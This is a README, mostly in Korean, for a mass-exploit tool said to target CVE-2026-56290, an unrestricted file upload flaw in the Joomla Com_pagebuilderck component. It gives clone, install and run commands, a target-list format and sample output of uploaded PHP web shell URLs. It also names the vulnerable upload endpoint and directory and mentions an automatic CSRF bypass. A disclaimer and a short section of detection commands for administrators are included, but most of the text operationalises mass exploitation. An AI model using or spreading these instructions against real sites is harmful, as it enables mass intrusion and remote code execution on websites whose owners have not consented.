
CVE-2026-56290 - Mass Exploit for Joomla Com_pagebuilderck component (Unrestricted File Upload → RCE). Multi-threaded, automatic CSRF bypass, PHP shell uploader.
이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다.
- 컴퓨터 시스템에 대한 무단 접근은 불법입니다.
- 소유하거나 테스트할 명시적 허가를 받은 시스템에서만 이 도구를 사용하십시오.
- 저자는 이 도구로 인한 오용이나 손해에 대해 책임지지 않습니다.
- 이 도구를 사용함으로써 귀하는 모든 관련 법률 및 규정을 준수하는 데 동의합니다.
더 많은 면책 조항은 Jenderal92의 표지에서 확인할 수 있습니다. 여기서 확인하세요!!!
CVE-2026-56290는 Com_pagebuilderck Joomla 구성 요소를 대상으로 하는 대량 익스플로잇 도구입니다. 이 취약점은 원격 공격자가 제한 없는 파일 업로드 메커니즘을 통해 임의의 PHP 파일을 업로드하여 원격 코드 실행(RCE)을 가능하게 합니다.
| 속성 | 값 |
|---|---|
| CVE ID | CVE-2026-56290 |
| 구성 요소 | Com_pagebuilderck |
| 플랫폼 | Joomla! CMS |
| 유형 | 제한 없는 파일 업로드 (RCE) |
| CVSS 점수 | 9.8 (Critical) |
/media/com_pagebuilderck/gfonts/에 업로드reslt.txt에 저장Python 2.7
pip (Python package installer)
Python 종속성
pip install requests colorama
🔧 설치
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 사용법
기본 사용법
python CVE-2026-56290.py targets.txt
입력 파일 형식
URL을 한 줄에 하나씩 포함하는 targets.txt 파일을 만드세요:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored
출력
· 콘솔 출력: 실시간 진행 상황 및 결과 · reslt.txt: 모든 취약한 셸 URL 포함
실행 예시
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt
[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...
[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ 설정
스크립트에서 다음 변수를 수정할 수 있습니다:
THREADS = 15 # Number of concurrent workers
TIMEOUT = 10 # Request timeout in seconds
USER_AGENT = "..." # Custom User-Agent string
OUTPUT_FILE = "reslt.txt" # Output filename
🛡️ 보안 고려 사항
시스템 관리자를 위한
Com_pagebuilderck을 사용하는 Joomla 사이트를 운영 중인 경우:
침해 지표 (IoC)
다음 익스플로잇 징후를 찾으십시오:
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
탐지 명령
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ 법적 고지
이 소프트웨어는 "있는 그대로" 제공되며, 어떠한 종류의 보증도 없습니다. 저자는 이 도구의 불법적 또는 비윤리적 사용에 대해 책임지지 않습니다. 항상 시스템을 테스트하기 전에 적절한 승인을 받으십시오.
🙏 감사의 말
· CVE-2026-56290을 발견하고 보고한 보안 연구자들 · CMS를 유지 관리하는 Joomla 커뮤니티
기억하세요: 큰 힘에는 큰 책임이 따릅니다. 이 도구를 윤리적이고 합법적으로 사용하십시오.